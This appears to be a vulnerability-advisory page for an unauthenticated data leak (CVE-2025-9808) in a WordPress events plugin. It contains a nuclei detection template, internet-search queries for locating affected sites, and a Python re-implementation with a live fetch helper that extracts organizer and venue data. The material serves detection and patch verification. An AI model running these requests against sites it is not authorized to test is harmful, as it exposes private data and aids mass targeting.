CVE-2025-9808: The Events Calendar <= 6.15.2 - Information Disclosure

Date: 2026-01-08 | Affected software: The Events Calendar | PoC: public

Vulnerability description

The Events Calendar WordPress plugin, in versions up to and including 6.15.2, contains an information disclosure vulnerability caused by exposed REST API endpoints. The organizers and venues collections under /wp-json/tribe/events/v1/ return data about password-protected organizers (written "vendors" in some descriptions) and venues to anyone who requests them, so no authentication is needed to exploit it.

PoC code [public]

id: CVE-2025-9808

info:
  name: The Events Calendar <= 6.15.2 - Information Disclosure
  author: zer0p0int
  severity: medium
  description: |
    The Events Calendar WordPress plugin, in versions up to and including 6.15.2, contains an information
    disclosure vulnerability caused by exposed REST API endpoints: the organizers and venues collections under
    /wp-json/tribe/events/v1/ return data about password-protected organizers and venues to unauthenticated requesters.
  impact: |
    Unauthenticated attackers can access sensitive information about password-protected vendors or venues.
  remediation: |
    Update The Events Calendar to a release newer than 6.15.2.
  reference:
    - https://www.wiz.io/vulnerability-database/cve/cve-2025-9808
    - https://wpscan.com/plugin/the-events-calendar/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-events-calendar
    - https://wordpress.org/plugins/the-events-calendar/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-9808
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"/wp-content/plugins/the-events-calendar/"
    fofa-query: body="/wp-content/plugins/the-events-calendar/"
    publicwww-query: "/wp-content/plugins/the-events-calendar/"
  tags: cve,cve2025,wordpress,wp-plugin,wpscan,the-events-calendar,unauth,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/tribe/events/v1/organizers"
      - "{{BaseURL}}/wp-json/tribe/events/v1/venues"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body,"rest_url","total")'
          - 'contains_any(body,"organizers","venues")'
          - 'contains(header,"application/json")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: organizer_data
        group: 1
        regex:
          - '"organizers":\[(.*?)\],"rest_url"'

      - type: regex
        part: body
        name: venue_data
        group: 1
        regex:
          - '"venues":\[(.*?)\],"rest_url"'
# digest: 4a0a0047304502201673a52f687efaa722968308d3f40ee35d3ffb5462cc28f1eff5137360aece08022100feab62f99f297b44e62813b3e160ec5047e4b1c7fa213309c7312e3fb14ed903:922c64590222798bb761d5b6d8e72950
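The following Python script is an added example for this page, not part of the nuclei template above or of the plugin. It re-implements the template's matcher and extractor so you can inspect exactly what a positive match means, and adds a JSON-based parse that does not depend on the key order the regex assumes. The sample response is constructed for the example (field names beyond id and rest_url are assumed, not taken from the plugin); the live fetch helper is only for hosts you are authorized to test.

```python
"""Offline re-implementation of the CVE-2025-9808 nuclei matcher/extractor logic.

Added example for this page; not part of the template or of The Events Calendar.
SAMPLE_BODY below is constructed, not captured from a real site.
"""
import json
import re
import urllib.error
import urllib.request
from typing import Dict, List, Optional

COLLECTIONS = ("organizers", "venues")
# Endpoint paths from the template above (The Events Calendar REST API v1).
PATHS = {c: f"/wp-json/tribe/events/v1/{c}" for c in COLLECTIONS}


def template_matches(status_code: int, headers: Dict[str, str], body: str) -> bool:
    """The template's DSL matcher, AND-ed: 200, JSON content type,
    body contains 'rest_url' and 'total', and one of the collection keys."""
    ctype = next((v for k, v in headers.items() if k.lower() == "content-type"), "")
    return (
        status_code == 200
        and "application/json" in ctype
        and "rest_url" in body
        and "total" in body
        and any(c in body for c in COLLECTIONS)
    )


def template_extract(body: str, collection: str) -> Optional[str]:
    """The template's regex extractor (group 1: raw JSON text inside the array).
    It only works when the array is immediately followed by ,"rest_url"."""
    m = re.search(r'"%s":\[(.*?)\],"rest_url"' % collection, body)
    return m.group(1) if m else None


def parse_entries(body: str) -> Dict[str, List[dict]]:
    """Parse the body as JSON instead: key order and the '],"rest_url"' adjacency
    the regex relies on are not guaranteed by the server."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return {}
    return {c: data[c] for c in COLLECTIONS if isinstance(data.get(c), list)}


def populated_fields(entry: dict) -> List[str]:
    """Names of the non-empty string fields in one entry. Compare the IDs that
    carry populated fields against the posts marked password-protected in
    wp-admin: on a patched site those should not expose their details here."""
    return sorted(k for k, v in entry.items() if isinstance(v, str) and v.strip())


def assess(status_code: int, headers: Dict[str, str], body: str) -> dict:
    """Full check: did the template match, and which fields each entry exposes."""
    if not template_matches(status_code, headers, body):
        return {"matched": False, "entries": {}}
    entries = parse_entries(body)
    return {
        "matched": True,
        "entries": {c: [(e.get("id"), populated_fields(e)) for e in items]
                    for c, items in entries.items()},
    }


def fetch(base_url: str, collection: str, timeout: int = 10):
    """Live request for an authorized target; returns (status, headers, body)."""
    req = urllib.request.Request(base_url.rstrip("/") + PATHS[collection],
                                 headers={"User-Agent": "cve-2025-9808-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, dict(resp.headers), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:  # non-2xx still has headers and a body
        return err.code, dict(err.headers), err.read().decode("utf-8", "replace")


# Constructed sample in the shape the template matches on (compact JSON, as
# WordPress emits it). Field names other than id/rest_url are assumed.
SAMPLE_HEADERS = {"Content-Type": "application/json; charset=UTF-8"}
SAMPLE_BODY = json.dumps({
    "organizers": [
        {"id": 101, "organizer": "Constructed Org", "description": "internal contact details",
         "phone": "+1 555 0100",
         "rest_url": "https://example.invalid/wp-json/tribe/events/v1/organizers/101"},
        {"id": 102, "organizer": "Second Org", "description": "",
         "rest_url": "https://example.invalid/wp-json/tribe/events/v1/organizers/102"},
    ],
    "rest_url": "https://example.invalid/wp-json/tribe/events/v1/organizers/",
    "total": 2,
    "total_pages": 1,
}, separators=(",", ":"))


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # python3 check.py https://target.example
        for c in COLLECTIONS:
            print(c, assess(*fetch(sys.argv[1], c)))
    else:
        print(assess(200, SAMPLE_HEADERS, SAMPLE_BODY))
```

A match only proves the collection endpoints answer unauthenticated; whether the returned entries belong to password-protected posts has to be confirmed against the site's own post list, which is why assess() reports the IDs and the fields that carry data rather than a bare yes/no.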
